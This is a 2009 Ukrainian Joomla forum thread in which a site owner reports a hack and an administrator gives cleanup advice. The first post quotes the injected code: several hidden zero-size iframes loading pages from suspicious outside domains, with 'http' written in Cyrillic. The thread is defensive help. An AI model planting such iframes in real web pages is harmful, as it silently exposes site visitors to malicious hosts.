Форум Joomla! Україна
  • Головна
  • Пошук
  • Користувачі
  • Команда форуму
  • Реєстрація
  • Увійти
    Увійти
    Ім’я користувача
    Пароль: Забули пароль?
     
  • Реєстрація
  • Увійти
Форум Joomla! Україна Веб-розробка Хостинг та домени Безпека сервера (хостингу) та сайту v
1 2 Наступне »
Joomla! iframe injection / hack


 
  • 0 голос(ів) - 0 у середньому
Joomla! iframe injection / hack
Andy
Не в мережі

Junior Member

Дописів: 4
Тем: 2
Приєднався: 07.08.2008, 03:50 PM
Репутація: 0
#1
09.01.2009, 06:08 PM
Почалося з того, що NOD32 заблокував попап вікно в редакторі tyniMCE при редагуванні лінків та якорів.
Виявилося, що в файлах
/pluginseditorstinymcejscriptstiny_mcethemesadvancedanchor.htm
/pluginseditorstinymcejscriptstiny_mcethemesadvancedlink.htm
знайшов ось таке
Цитата:...
</html>
<iframe src="хттп://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
тільки іфрейми однією стрічкою (що характерно, якщо не однією стрічкою - антивірус не бере), і звісно ж хттп як http.

Отут прочитав [url=]http://benmay.org/web-design-info/joomla-iframe-injection-hack[/url=] що це хак і заражено багато файлів.

Наслідки:
- сторінки блокуються антивіром (і не тільки поп-апи), тобто деякий денай оф сервіс
- тормозить при формуванні сторінок
- реалізована заготовка для закачування вредоносного коду

Хто знає де в джумлі проблема і як цю дірку заліпити ?

P.S. сайт у грудні було оновлено до останньої версії 1.5.8, але цей апдейт не заміщує файлів що заражено.
Dutch
Не в мережі

Адміністратор

Дописів: 1,195
Тем: 58
Приєднався: 28.10.2006, 04:49 PM
Репутація: 4
#2
09.01.2009, 06:31 PM
1. Оновити до останньої версії джумла, своєї лінійки
2. змінити всюди де вікористовується доступ до фтп сайту логіни та паролі до фтп
3. змінити логіни та паролі до БД
4. перевірити антивірусом компи з яких є доступ до фтп
5. перевірити фаєрволом порти, наявність троянів, спайвери

Висновок: хакнули трояном спочатку ваш комп та викрали паролі до фтп, а вже далі зайшли на ваш сайт як юзер (див. логи сервера хто та звідки по ай пі, і можете сміливо відписувати провайдеру того хто хакнув ваш сайт Smile ).
Хостинг для Joomla | Joomla! Україна | Підтримайте проект Joomla! Україна пожертвуванням
Заробляйте гроші на своєму сайті через SAPE
Andy
Не в мережі

Junior Member

Дописів: 4
Тем: 2
Приєднався: 07.08.2008, 03:50 PM
Репутація: 0
#3
10.01.2009, 09:17 PM
Дуже дякую за відповідь. На роботі та вдома компи захищені, але ж, звісно, ідеального захисту не існує. От у колеги віруси регулярно, але я не впевнений що інформацію поцупули через його комп.

Джумлу полікував, патч 1.5.8 -> 1.5.9 навернув. Явки, та паролі змінив.
Було заражено мейже усі файли html, а також файли index.php та administrator\index.php зі зміною тексту, щоб антивірус не схоплював. Думаю, що через ці базові файли вкачувався код, який заражав рештку файлів. Бо при першому лікуванні я не знайшов сігнатури в цих файлах і не замінив їх. І через деякий час все було знов завалено іфреймами.

Поки що все гаразд.
Цікаво було б дізнатися яка сволота погралася.
« Попередня | Наступна »

Переглядають цю тему: Гості: 1



  • Версію для друку
  • Підписатися на цю тему
Швидкий перехід:

  • Команда форуму
  • Зв’яжіться з нами
  • Joomla! Україна
  • Повернутись на початок
  • Легкий режим
  • Позначити всі форуми прочитаними
  • RSS канал
Лінійний режим
Каскадний режим